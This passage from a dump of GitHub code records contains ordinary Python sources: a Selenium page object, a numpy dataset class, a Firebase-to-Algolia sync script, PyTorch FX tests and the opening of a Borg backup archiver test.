self.click(self.project_click)\n sleep(0.5)\n self.click(self.clear_click)\n sleep(0.5)\n self.send_keys(self.project_input, '香碧歌')\n sleep(0.5)\n self.click(self.project_select)\n log.info(u'票据段统计信息--选择项目')\n sleep(0.5)\n self.click(self.clear_click)\n sleep(0.5)\n\n def finance_startno_input(self):\n self.send_keys(self.startno_input, 1)\n log.info(u'票据段统计信息--输入起始号码')\n sleep(0.5)\n\n def finance_endno_input(self):\n self.send_keys(self.endno_input, 99999999)\n log.info(u'票据段统计信息--输入结束号码')\n sleep(0.5)\n\n def finance_search_click(self):\n self.click(self.search_click)\n log.info(u'票据段统计信息--查询')\n sleep(5)\n\n def finance_reset_click(self):\n self.click(self.reset_click)\n log.info(u'票据段统计信息--重置')\n sleep(0.5)\n\n def finance_data_a_click(self):\n self.click(self.data_a_click)\n log.info(u'票据段统计信息--选择数据')\n sleep(0.5)\n\n def finance_catdetail_a_click(self):\n self.click(self.catdetail_a_click)\n log.info(u'票据段统计信息--查看明细')\n sleep(2)\n\n def finance_data_b_click(self):\n self.driver.switch_to.window(self.driver.window_handles[2])\n sleep(3)\n self.click(self.data_b_click)\n log.info(u'票据段统计信息--选择数据')\n sleep(0.5)\n\n def finance_catdetail_b_click(self):\n self.click(self.catdetail_b_click)\n log.info(u'票据段统计信息--查看详情')\n sleep(2)\n\n def finance_data_get(self):\n n = self.driver.find_elements_by_xpath(self.data_get)\n if len(n) > 0:\n log.info(u'票据段统计信息--查看数据正确')\n sleep(0.5)\n\n def finance_detail_click(self):\n self.click(self.detail_click)\n log.info(u'票据段统计信息--点击票据明细')\n sleep(0.5)\n\n def finance_close_click(self):\n self.click(self.close_click)\n log.info(u'票据段统计信息--关闭窗口')\n sleep(0.5)\n self.driver.close()\n sleep(0.5)\n self.driver.switch_to.window(self.driver.window_handles[1])\n 
sleep(0.5)","repo_name":"labixiaoxi/testJustbon","sub_path":"testJustbon/pageObject/financeReceiptCountPage.py","file_name":"financeReceiptCountPage.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3469279125","text":"import csv\nimport numpy as np\nfrom typing import Any, Callable, Optional, Type, TypeVar\n\nT = TypeVar('T', bound='Dataset')\n\nclass Dataset:\n \"\"\"A generic dataset handling common dataset operations\"\"\"\n\n n: int = None\n vals: np.ndarray = None # Shape: (n)\n coords: np.ndarray = None # Shape: (n,2)\n dist: np.ndarray = None # Shape: (n,n)\n\n def __init__(\n self,\n n: int,\n vals: np.ndarray,\n coords: np.ndarray,\n precalc_dist: bool = True) -> None:\n self.n = n\n self.vals = vals\n self.coords = coords\n\n # precalculate euclidean distances between points\n if precalc_dist:\n coords_row = np.repeat(self.coords[:, np.newaxis, ...], self.n, axis=1)\n coords_col = np.repeat(self.coords[np.newaxis, ...], self.n, axis=0)\n coords_diff = (coords_row - coords_col)\n self.dist = np.linalg.norm(coords_diff, ord=2, axis=-1)\n\n def dist(i, j) -> np.float:\n \"\"\"Calculates distance between two cities\"\"\"\n if self.dist:\n return self.dist[i,j]\n else:\n return np.linalg.norm(self.coords[i] - self.coords[j], ord=2)\n\n @classmethod\n def load(cls: Type[T], root: str, **kwargs: Any) -> T:\n \"\"\"Loads a dataset from the disk\"\"\"\n vals = np.load(root + '/vals.npy')\n coords = np.load(root + '/coords.npy')\n n = coords.shape[0]\n return cls(n, vals, coords, **kwargs)\n\n @classmethod\n def save(cls: type, root: str) -> None:\n \"\"\"Saves a dataset to disk\"\"\"\n np.save(root + '/vals.npy', dataset.vals)\n np.save(root + '/coords.npy', dataset.coords)\n\nclass GeneratorDataset(Dataset):\n \"\"\"Dataset with explicit generators\"\"\"\n\n def __init__(\n self,\n n: int,\n seed: int,\n val_gen: Callable,\n coord_gen: Callable,\n **kwargs: Any) -> None:\n\n # set seed for reproducibility\n np.random.seed(seed)\n\n # initialize dataset\n super().__init__(\n n,\n val_gen(n),\n coord_gen(n),\n **kwargs\n )\n\nclass G1Dataset(GeneratorDataset):\n \"\"\"Implements given G1 generative model\"\"\"\n def __init__(\n self,\n n: int = 100,\n seed: int = 1,\n **kwargs: Any) -> None:\n\n val_gen = lambda n: np.random.uniform(low=0, high=1, size=n) \n coord_gen = lambda n: np.random.uniform(low=0, high=1, size=(n,2))\n\n super().__init__(\n n,\n seed,\n val_gen,\n coord_gen,\n **kwargs\n )\n\nclass G2Dataset(GeneratorDataset):\n \"\"\"Implements given G2 generative model\"\"\"\n def __init__(\n self,\n n: int = 100,\n seed: int = 1,\n **kwargs: Any) -> None:\n\n val_gen = lambda n: np.exp(np.random.normal(loc=-0.85, scale=1.3, size=n))\n coord_gen = lambda n: np.random.uniform(low=0, high=1, size=(n,2))\n\n super().__init__(\n n,\n seed,\n val_gen,\n coord_gen,\n **kwargs\n )\n\nclass CSVDataset(Dataset):\n def __init__(\n self,\n path: str,\n ) -> None:\n with open(path, 'r') as file:\n reader = csv.reader(file)\n rows = []\n for r in reader:\n rows.append(r)\n rows = rows[1:]\n \n self.ids = np.array([ r[0] for r in rows ])\n super().__init__(\n n=len(rows),\n vals=np.array([ float(r[1]) for r in rows ]),\n coords=np.array([ [float(r[2]), float(r[3])] for r in rows ])\n )\n\n def output_csv(\n self,\n path: str,\n cities: np.ndarray\n ) -> None:\n out = [['id', 'include']]\n for i in range(len(self.ids)):\n out.append([ self.ids[i], (1 if i in cities else 0) ])\n\n with 
open(path, 'w+') as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerows(out)\n","repo_name":"okyksl/com-516-project","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22834858035","text":"import os\nfrom algoliasearch.search_client import SearchClient\nimport json\nimport firebase_admin\nimport google.cloud\nfrom firebase_admin import credentials, firestore\nfrom pathlib import Path\nfrom dotenv import load_dotenv\nimport sys\n\nenv_path = Path('../../../') / '.env'\nload_dotenv(dotenv_path=env_path)\n\nFIREBASE_PROJECT_ID = os.getenv(\"FIREBASE_PROJECT_ID\")\ncred = credentials.Certificate('../../../jacaranda-app-firebase-adminsdk.json')\n\ndefault_app = firebase_admin.initialize_app(cred, {\n 'projectId': FIREBASE_PROJECT_ID,\n})\n\nfirestore_client = firestore.client()\ndoc_ref = firestore_client.collection('properties')\n\ndef get_all_properties_firebase():\n all_properties = doc_ref.stream()\n current_properties = []\n for doc in all_properties:\n current_properties.append(doc.to_dict())\n \n return current_properties\n\ndef save_to_algolia():\n properties_on_firebase = get_all_properties_firebase()\n\n algolia_data = []\n query = '' # Empty query will match all record\n res = index.browse_objects({'query': query})\n\n for hit in res:\n algolia_data.append(hit)\n \n actual_properties = []\n for obj in properties_on_firebase:\n if not any(item.get('uuid', None) == obj['uuid'] for item in algolia_data):\n district = obj['district']\n\n data = {\n 'title': obj['title'],\n 'price': obj['price'],\n 'uuid': obj['uuid'],\n 'district': district.replace(\" \", \"\"),\n 'images': obj['images'][0],\n 'property_details': obj['property_details'],\n 'property_info': obj['property_info'] if 'property_info' in obj else []\n }\n actual_properties.append(data)\n\n\n chunk_size = 100\n chunks = [actual_properties[i:i+chunk_size] for i in range(0, len(actual_properties), chunk_size)]\n\n for chunk in chunks:\n index.save_objects(chunk, {'autoGenerateObjectIDIfNotExist': True})\n\n\n\nif __name__ == \"__main__\":\n ALGOLIA_APP = os.getenv('ALGOLIA_APP_ID')\n ALGOLIA_ADMIN_API_KEY = os.getenv('ALGOLIA_ADMIN_API_KEY')\n client = SearchClient.create(ALGOLIA_APP, ALGOLIA_ADMIN_API_KEY)\n index = client.init_index('jacaranda')\n save_to_algolia()\n\n","repo_name":"geekycoder28/python-scrapping","sub_path":"uservices/news_scrapper/app/algolia.py","file_name":"algolia.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25705077368","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Nikolay Mamashin (mamashin@gmail.com)'\n\nfrom decouple import config\n\n\nfake_yandex_oauth = {\n \"client_id\": config('CLIENT_ID'),\n \"client_secret\": config('CLIENT_SECRET'),\n \"client_code\": config('CLIENT_CODE'),\n \"token\": config('TOKEN'),\n \"user_id\": config('USER_ID')\n}\n","repo_name":"mamashin/alice_plus_fastapi","sub_path":"fake_yandex_oauth.py","file_name":"fake_yandex_oauth.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73208051464","text":"#coding:utf-8\n\nfrom\tdjango.db\timport\tconnections, transaction\n\n\n\n### --- Получение списка дат на сегодня ---\ndef\tGetDatesList():\n cursor = connections['default'].cursor()\n 
cursor.execute(\"SELECT * FROM t_show_user_dates;\")\n data = cursor.fetchall()\n \n return data\n \n","repo_name":"v-komarov/authbase","sub_path":"authbase/lib/dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33772997996","text":"# permutation02.py [with Duplicates\ndef main():\n A = 'abbc'\n n = len(A)\n items, counts = getCount(A)\n solutions = []\n window = []\n level = 0\n solutions = findPermutations(items, counts, window, solutions, level, n)\n\n for permutation in solutions:\n print(permutation)\n\n# returns all permutations in lexicographical order\ndef findPermutations(items, counts, window, solutions, level, n):\n\n # base case\n if level == n:\n solutions.append(window[:])\n return solutions\n\n for i in range(len(counts)):\n if counts[i] == 0:\n continue\n\n counts[i] -= 1\n window.append(items[i])\n findPermutations(items, counts, window, solutions, level+1, n)\n window.pop()\n counts[i] += 1\n\n return solutions\n\ndef getCount(A):\n itemcount = dict()\n for item in A:\n if itemcount.get(item, 0) == 0:\n itemcount[item] = 1\n else:\n itemcount[item] += 1\n items = list((itemcount.keys()))\n items.sort()\n counts = [itemcount[item] for item in items]\n return items, counts\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rimesh/InterviewBit","sub_path":"Backtracking/permutation02.py","file_name":"permutation02.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42618772478","text":"import torch\nimport unittest\nimport operator\nimport numbers\nfrom torch.fx import symbolic_trace, Proxy, Node, GraphModule, DefaultDelegate\n\nfrom fx.quantization import Quantizer\n\nfrom typing import Any, Callable, Dict, Optional, Tuple, Union\nfrom torch.testing._internal.common_utils import run_tests, skipIfRocm\nfrom torch.testing._internal.jit_utils import JitTestCase\n\ntry:\n from torchvision.models import resnet18\n HAS_TORCHVISION = True\nexcept ImportError:\n HAS_TORCHVISION = False\nskipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, \"no torchvision\")\n\nclass TestFX(JitTestCase):\n def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):\n \"\"\"Check that an nn.Module's results match the GraphModule version\n for a given set of args/kwargs.\n \"\"\"\n kwargs = kwargs if kwargs else {}\n ref_outs = m(*args, **kwargs)\n gm = symbolic_trace(m)\n test_outs = gm(*args, **kwargs)\n self.assertEqual(ref_outs, test_outs)\n\n def test_graph_module(self):\n class MySub(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.w = torch.nn.Parameter(torch.rand(4, 3))\n\n def forward(self, x):\n return self.w + x\n\n class MyModule(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.lin = torch.nn.Linear(4, 3)\n self.sub_mod = MySub()\n self.w = torch.nn.Parameter(torch.rand(3))\n\n def forward(self, A, B, c):\n t = torch.sigmoid(A) + self.lin(c)\n return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))\n\n m = MyModule()\n gm = symbolic_trace(m)\n\n ms = torch.jit.script(gm)\n\n class M2(torch.nn.Module):\n def forward(self, A):\n m, idx = torch.max(A, 0)\n return m + 1, idx + 1\n\n m2 = M2()\n gm2 = symbolic_trace(m2)\n\n class T(torch.nn.Module):\n\n def forward(self, A, b=4, *args, c=5, **kwargs):\n x = A + 1 + args[0] + kwargs['3']\n return x\n\n t = T()\n 
symbolic_trace(t)\n\n def test_args_kwargs(self):\n class T(torch.nn.Module):\n def forward(self, *args, **kwargs):\n x = args[0] + kwargs['foo']\n return x\n\n t = T()\n self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})\n\n def test_fx_shifts(self):\n class MyModule(torch.nn.Module):\n def forward(self, x):\n return x << 3, x >> 3\n\n input = torch.LongTensor(10).random_(0, 1024)\n\n m = MyModule()\n self.checkGraphModule(m, (input,))\n\n def test_dict(self):\n class MyDictMod(torch.nn.Module):\n def forward(self, d):\n return d['3'].relu(), {'4' : d['3'].neg()}\n\n input_dict = {'3': torch.rand(3, 4)}\n m = MyDictMod()\n\n self.checkGraphModule(m, (input_dict,))\n\n def test_disallow_override(self):\n # Custom delegate to disallow in-place tensor operations\n class NoMutableCallDelegate(DefaultDelegate):\n def create_node(self, kind : str, target : Union[str, Callable],\n args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None) -> Node:\n name = target if isinstance(target, str) else torch.typename(target)\n if name[-1] == '_':\n raise RuntimeError('In-place operations are not supported')\n return super().create_node(kind, target, args, kwargs, name)\n\n # Test method\n class MyInplaceMod(torch.nn.Module):\n def forward(self, x):\n x.add_(3.0)\n return x\n\n m = MyInplaceMod()\n\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m, delegate_class=NoMutableCallDelegate)\n\n # Test free function\n class MyInplaceMod2(torch.nn.Module):\n def forward(self, x):\n torch.log_(x)\n return x\n m2 = MyInplaceMod2()\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m2, delegate_class=NoMutableCallDelegate)\n\n # Test symbolic node as an arg\n class MyInplaceMod3(torch.nn.Module):\n def forward(self, x):\n y = torch.ones(3, 4)\n y.add_(x)\n return x\n m3 = MyInplaceMod3()\n with self.assertRaisesRegex(RuntimeError, 'In-place operations'):\n symbolic_trace(m3, delegate_class=NoMutableCallDelegate)\n\n def test_leaf_module(self):\n # Custom delegate to make it so that there are no leaf modules, everything\n # should get traced through\n class NoLeafModulesDelegate(DefaultDelegate):\n def is_leaf_module(self, m):\n return False\n\n class MyReluMod(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n return self.relu(x)\n\n mrm = MyReluMod()\n sym = symbolic_trace(mrm, delegate_class=NoLeafModulesDelegate)\n for node in sym.graph.nodes:\n self.assertNotEqual(node.op, 'call_module')\n\n def test_graph_edit_with_proxy(self):\n class M(torch.nn.Module):\n def forward(self, a, b):\n return a + b\n m = M()\n g = symbolic_trace(m).graph\n t = Proxy(g.result)\n # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.\n g.output((t + t).node)\n gm = GraphModule(m, g)\n self.assertEqual(gm(3, 4), 14)\n\n @skipIfNoTorchVision\n def test_resnet(self):\n resnet = resnet18()\n resnet.train()\n\n res_graph = symbolic_trace(resnet)\n res_script = torch.jit.script(res_graph)\n\n ip = torch.rand(1, 3, 224, 224)\n\n a = resnet(ip)\n b = res_graph(ip)\n c = res_script(ip)\n assert torch.allclose(a, b)\n assert torch.allclose(a, c)\n\n quantizer = Quantizer(res_graph)\n\n for i in range(10):\n quantizer.observe((torch.rand(1, 3, 224, 224),))\n\n qgraph = quantizer.quantize()\n qgraph_script = torch.jit.script(qgraph)\n\n d = qgraph(ip)\n e = qgraph_script(ip)\n\n assert (a - 
d).abs().max() < 2\n assert torch.allclose(d, e)\n\n def test_unpack(self):\n class M(torch.nn.Module):\n def forward(self, a, b):\n c, d = a\n return c + d + b\n\n a = (torch.rand(1), torch.rand(1))\n b = torch.rand(1)\n m = M()\n self.checkGraphModule(m, (a, b))\n\n @skipIfRocm\n def test_native_callable(self):\n # This test exercises the case where we use FX to translate from Python\n # code to some native callable object\n #\n # For the purposes of testing, we use ElementwiseInterpreter defined\n # in test_custom_class.cpp.\n #\n # We test that we can\n # 1) Construct a native callable from FX IR\n # 2) Construct a drop-in replacement module that delegates to the\n # native callable rather than the original code\n # 3) Run both the original code and native callable wrapper with\n # equivalent results\n # 4) TorchScript compile the native callable wrapper and confirm\n # equivalent results with the reference\n # 5) TorchScript serialize and deserialize the native callable\n # and confirm equivalent results with the reference\n\n # We use this simple Module as a reference computation\n class MySimpleMod(torch.nn.Module):\n def forward(self, x):\n return 3.0 * x + x\n\n msm = MySimpleMod()\n\n # This is what a lowering pass might look like: a function that takes\n # a valid nn.Module, symbolically traces it, lowers the Module to some\n # representation, and wraps that representation up into another\n # nn.Module instance that handles dispatch to the compiled/lowered code.\n def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:\n # ===== Stage 1: Symbolic trace the module =====\n mod = symbolic_trace(orig_mod)\n\n # ===== Stage 2: Lower GraphModule representation to the C++\n # interpreter's instruction format ======\n instructions = []\n constant_idx = 0\n constants = {}\n fn_input_names = []\n\n target_to_name = {\n operator.add : \"add\",\n operator.mul : \"mul\"\n }\n\n # For each instruction, create a triple\n # (instruction_name : str, inputs : List[str], output : str)\n # to feed into the C++ interpreter\n for n in mod.graph.nodes:\n target, args, out_name = n.target, n.args, n.name\n assert len(n.kwargs) == 0, \"kwargs currently not supported\"\n\n if n.op == 'placeholder':\n # Placeholders specify function argument names. Save these\n # for later when we generate the wrapper GraphModule\n fn_input_names.append(target)\n elif n.op == 'call_function':\n assert target in target_to_name, \"Unsupported call target \" + target\n arg_names = []\n for arg in args:\n if not isinstance(arg, Node):\n # Pull out constants. 
These constants will later be\n # fed to the interpreter C++ object via add_constant()\n arg_name = f'constant_{constant_idx}'\n constants[arg_name] = torch.Tensor(\n [arg] if isinstance(arg, numbers.Number) else arg)\n arg_names.append(arg_name)\n constant_idx += 1\n else:\n arg_names.append(arg.name)\n instructions.append((target_to_name[target], arg_names, out_name))\n\n else:\n raise RuntimeError('Unsupported opcode' + n.op)\n\n interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()\n # Load constants\n for k, v in constants.items():\n interpreter.add_constant(k, v)\n # Specify names for positional input arguments\n interpreter.set_input_names(fn_input_names)\n # Load instructions\n interpreter.set_instructions(instructions)\n # Specify name for single output\n interpreter.set_output_name(mod.graph.result.name)\n\n # ===== Stage 3: Create a wrapper GraphModule around the interpreter =====\n class WrapperModule(torch.nn.Module):\n def __init__(self, interpreter):\n super().__init__()\n self.interpreter = interpreter\n\n wrapper = WrapperModule(interpreter)\n\n # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter\n # 3) Returns the speficied return value\n\n # FIXME: The following code could be greatly simplified by symbolic_trace'ing\n # the wrapper with a Delegate that considers the Wrapper instance a root\n # module, however, I can't get `__call__` exposed on TorchBind classes\n # without it messing up Python `hasattr` for some reason. More digging\n # into CPython's implementation of hasattr is probably in order...\n\n graph = torch.fx.Graph()\n # Add placeholders for fn inputs\n placeholder_nodes = []\n for name in fn_input_names:\n placeholder_nodes.append(graph.create_node('placeholder', name))\n\n # Get the interpreter object\n interpreter_node = graph.create_node('get_param', 'interpreter')\n\n # Add a node to call the interpreter instance\n output_node = graph.create_node(\n op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))\n\n # Register output\n graph.output(output_node)\n\n # Return final GraphModule!!!\n return GraphModule(wrapper, graph)\n\n\n # Lower GraphModule to C++ interpreter\n lowered = lower_to_elementwise_interpreter(msm)\n\n # Compare correctness with original module\n x = torch.rand(3, 4)\n ref_out = msm(x)\n test_out = lowered(x)\n torch.testing.assert_allclose(test_out, ref_out)\n\n # Test TorchScript compilation\n scripted_lowered = torch.jit.script(lowered)\n script_out = scripted_lowered(x)\n torch.testing.assert_allclose(script_out, ref_out)\n\n # Test TorchScript ser/de\n import_copy = self.getExportImportCopy(scripted_lowered)\n imported_out = import_copy(x)\n torch.testing.assert_allclose(imported_out, ref_out)\n\n def test_reserved_getattr(self):\n \"\"\"Ensure that we do not name any nodes with a reserved builtin like `getattr`\"\"\"\n class M(torch.nn.Module):\n def forward(self, a):\n return a.foo.bar.baz\n\n m = M()\n m_g = symbolic_trace(m)\n for node in m_g.graph.nodes:\n self.assertTrue(node.name != \"getattr\")\n\n def test_node_tagging(self):\n class TaggingDelegate(DefaultDelegate):\n def create_node(self, kind : str, target : Union[str, Callable],\n args : Tuple[Any], kwargs : Dict[str, Any], name : Optional[str] = None) -> Node:\n n = super().create_node(kind, target, args, kwargs, name)\n n.tag = 'foo'\n return n\n\n class M(torch.nn.Module):\n def forward(self, a, b):\n return a + b\n\n m = M()\n g = symbolic_trace(m, TaggingDelegate).graph\n for n in g.nodes:\n 
self.assertTrue(hasattr(n, 'tag'))\n self.assertEqual(n.tag, 'foo')\n\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"stonne-simulator/stonne","sub_path":"pytorch-frontend/test/test_fx.py","file_name":"test_fx.py","file_ext":"py","file_size_in_byte":14380,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"81"} +{"seq_id":"34646104572","text":"import os\nimport sys\nimport glob\nimport json\nimport joblib\nimport numpy as np\nimport smplx\nimport torch\n\nfrom util.loaders import load_smpl_body_model\nfrom util.tensor import move_to, detach_all, to_torch\nfrom optim.output import load_result, get_results_paths\nfrom geometry.pcl import align_pcl\nfrom geometry.rotation import batch_rodrigues\n\nBASE_DIR = os.path.abspath(f\"{__file__}/../../../\")\nJOINT_REG_PATH = f\"{BASE_DIR}/_DATA/body_models/J_regressor_h36m.npy\"\n\n\n# XXX: Sorry, need to change this yourself\nEGOBODY_ROOT = \"/path/to/egobody\"\nTDPW_ROOT = \"/path/to/3DPW\"\n\n\nclass JointRegressor(object):\n def __init__(self):\n # (17, 6890)\n R17 = torch.from_numpy(np.load(JOINT_REG_PATH).astype(np.float32))\n # (14,) adding the root, but will omit\n joint_map_h36m = torch.tensor([6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10])\n self.regressor = R17[joint_map_h36m] # (14, 6890)\n\n def to(self, device):\n self.regressor = self.regressor.to(device)\n\n def __call__(self, verts):\n \"\"\"\n NOTE: RETURNS ROOT AS WELL\n :param verts (*, V, 3)\n returns (*, J, 3) 14 standard evaluation joints\n \"\"\"\n return torch.einsum(\"nv,...vd->...nd\", self.regressor, verts) # (..., 14, 3)\n\n\ndef compute_accel_norm(joints):\n \"\"\"\n :param joints (T, J, 3)\n \"\"\"\n vel = joints[1:] - joints[:-1] # (T-1, J, 3)\n acc = vel[1:] - vel[:-1] # (T-2, J, 3)\n return torch.linalg.norm(acc, dim=-1)\n\n\ndef global_align_joints(gt_joints, pred_joints):\n \"\"\"\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n s_glob, R_glob, t_glob = align_pcl(\n gt_joints.reshape(-1, 3), pred_joints.reshape(-1, 3)\n )\n pred_glob = (\n s_glob * torch.einsum(\"ij,tnj->tni\", R_glob, pred_joints) + t_glob[None, None]\n )\n return pred_glob\n\n\ndef first_align_joints(gt_joints, pred_joints):\n \"\"\"\n align the first two frames\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n # (1, 1), (1, 3, 3), (1, 3)\n s_first, R_first, t_first = align_pcl(\n gt_joints[:2].reshape(1, -1, 3), pred_joints[:2].reshape(1, -1, 3)\n )\n pred_first = (\n s_first * torch.einsum(\"tij,tnj->tni\", R_first, pred_joints) + t_first[:, None]\n )\n return pred_first\n\n\ndef local_align_joints(gt_joints, pred_joints):\n \"\"\"\n :param gt_joints (T, J, 3)\n :param pred_joints (T, J, 3)\n \"\"\"\n s_loc, R_loc, t_loc = align_pcl(gt_joints, pred_joints)\n pred_loc = (\n s_loc[:, None] * torch.einsum(\"tij,tnj->tni\", R_loc, pred_joints)\n + t_loc[:, None]\n )\n return pred_loc\n\n\ndef load_body_model(batch_size, model_type, gender, device):\n assert model_type in [\"smpl\", \"smplh\"]\n if model_type == \"smpl\":\n num_betas = 10\n ext = \"pkl\"\n use_vtx_selector = False\n else:\n num_betas = 16\n ext = \"npz\"\n use_vtx_selector = True\n\n smpl_path = f\"{BASE_DIR}/body_models/{model_type}/{gender}/model.{ext}\"\n body_model, fit_gender = load_smpl_body_model(\n smpl_path,\n batch_size,\n num_betas,\n model_type=model_type,\n use_vtx_selector=use_vtx_selector,\n device=device,\n )\n return body_model\n\n\ndef run_smpl(body_model, *args, **kwargs):\n with torch.no_grad():\n results = 
body_model(*args, **kwargs)\n return {\n \"joints\": results.Jtr.detach().cpu(),\n \"vertices\": results.v.detach().cpu(),\n \"faces\": results.f.detach().cpu(),\n }\n\n\ndef run_smpl_batch(body_model, device, **kwargs):\n model_kwargs = {}\n B = body_model.bm.batch_size\n kwarg_shape = (B,)\n for k, v in kwargs.items():\n kwarg_shape = v.shape[:-1]\n model_kwargs[k] = v.reshape(B, v.shape[-1]).to(device)\n res_flat = run_smpl(body_model, **model_kwargs)\n res = {}\n for k, v in res_flat.items():\n sh = v.shape\n if sh[0] == B:\n v = v.reshape(*kwarg_shape, *sh[1:])\n res[k] = v\n return res\n\n\ndef cat_dicts(dict_list, dim=0):\n \"\"\"\n concatenate lists of dict of tensors\n \"\"\"\n keys = set(dict_list[0].keys())\n assert all(keys == set(d.keys()) for d in dict_list)\n return {k: torch.stack([d[k] for d in dict_list], dim=dim) for k in keys}\n\n\ndef load_results_all(phase_dir, device):\n \"\"\"\n Load all the reconstructed tracks during optimization\n \"\"\"\n res_path_dict = get_results_paths(phase_dir)\n max_iter = max(res_path_dict.keys())\n if int(max_iter) < 20:\n print(\"max_iter\", max_iter)\n return None\n\n res = load_result(res_path_dict[max_iter])[\"world\"]\n # results is dict with (B, T, *) tensors\n trans = res[\"trans\"]\n B, T, _ = trans.shape\n root_orient = res[\"root_orient\"]\n pose_body = res[\"pose_body\"]\n betas = res[\"betas\"].reshape(B, 1, -1).expand(B, T, -1)\n body_model = load_body_model(B * T, \"smplh\", \"neutral\", device)\n return run_smpl_batch(\n body_model,\n device,\n trans=trans,\n root_orient=root_orient,\n betas=betas,\n pose_body=pose_body,\n )\n","repo_name":"vye16/slahmr","sub_path":"slahmr/eval/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":368,"dataset":"github-code","pt":"81"} +{"seq_id":"12452030927","text":"import errno\nimport json\nimport os\nfrom random import randbytes\nimport shutil\nimport socket\nimport stat\nimport time\nimport unittest\n\nimport pytest\n\nfrom ... import platform\nfrom ...constants import * # NOQA\nfrom ...manifest import Manifest\nfrom ...repository import Repository\nfrom .. import has_lchflags\nfrom .. import changedir\nfrom .. import (\n are_symlinks_supported,\n are_hardlinks_supported,\n are_fifos_supported,\n is_utime_fully_supported,\n is_birthtime_fully_supported,\n)\nfrom . 
import (\n ArchiverTestCaseBase,\n ArchiverTestCaseBinaryBase,\n RemoteArchiverTestCaseBase,\n RK_ENCRYPTION,\n BORG_EXES,\n requires_hardlinks,\n)\n\n\nclass ArchiverTestCase(ArchiverTestCaseBase):\n def test_basic_functionality(self):\n have_root = self.create_test_files()\n # fork required to test show-rc output\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"rcreate\", RK_ENCRYPTION, \"--show-version\", \"--show-rc\", fork=True\n )\n self.assert_in(\"borgbackup version\", output)\n self.assert_in(\"terminating with success status, rc 0\", output)\n self.cmd(f\"--repo={self.repository_location}\", \"create\", \"--exclude-nodump\", \"test\", \"input\")\n output = self.cmd(\n f\"--repo={self.repository_location}\", \"create\", \"--exclude-nodump\", \"--stats\", \"test.2\", \"input\"\n )\n self.assert_in(\"Archive name: test.2\", output)\n with changedir(\"output\"):\n self.cmd(f\"--repo={self.repository_location}\", \"extract\", \"test\")\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"rlist\", \"--short\")\n self.assert_in(\"test\", list_output)\n self.assert_in(\"test.2\", list_output)\n expected = [\n \"input\",\n \"input/bdev\",\n \"input/cdev\",\n \"input/dir2\",\n \"input/dir2/file2\",\n \"input/empty\",\n \"input/file1\",\n \"input/flagfile\",\n ]\n if are_fifos_supported():\n expected.append(\"input/fifo1\")\n if are_symlinks_supported():\n expected.append(\"input/link1\")\n if are_hardlinks_supported():\n expected.append(\"input/hardlink\")\n if not have_root:\n # we could not create these device files without (fake)root\n expected.remove(\"input/bdev\")\n expected.remove(\"input/cdev\")\n if has_lchflags:\n # remove the file we did not backup, so input and output become equal\n expected.remove(\"input/flagfile\") # this file is UF_NODUMP\n os.remove(os.path.join(\"input\", \"flagfile\"))\n list_output = self.cmd(f\"--repo={self.repository_location}\", \"list\", \"test\", \"--short\")\n for name in expected:\n self.assert_in(name, list_output)\n self.assert_dirs_equal(\"input\", \"output/input\")\n info_output = self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\")\n item_count = 5 if has_lchflags else 6 # one file is UF_NODUMP\n self.assert_in(\"Number of files: %d\" % item_count, info_output)\n shutil.rmtree(self.cache_path)\n info_output2 = self.cmd(f\"--repo={self.repository_location}\", \"info\", \"-a\", \"test\")\n\n def filter(output):\n # filter for interesting \"info\" output, ignore cache rebuilding related stuff\n prefixes = [\"Name:\", \"Fingerprint:\", \"Number of files:\", \"This archive:\", \"All archives:\", \"Chunk index:\"]\n result = []\n for line in output.splitlines():\n for prefix in prefixes:\n if line.startswith(prefix):\n result.append(line)\n return \"\\n\".join(result)\n\n # the interesting parts of info_output2 and info_output should be same\n self.assert_equal(filter(info_output), filter(info_output2))\n\n @requires_hardlinks\n def 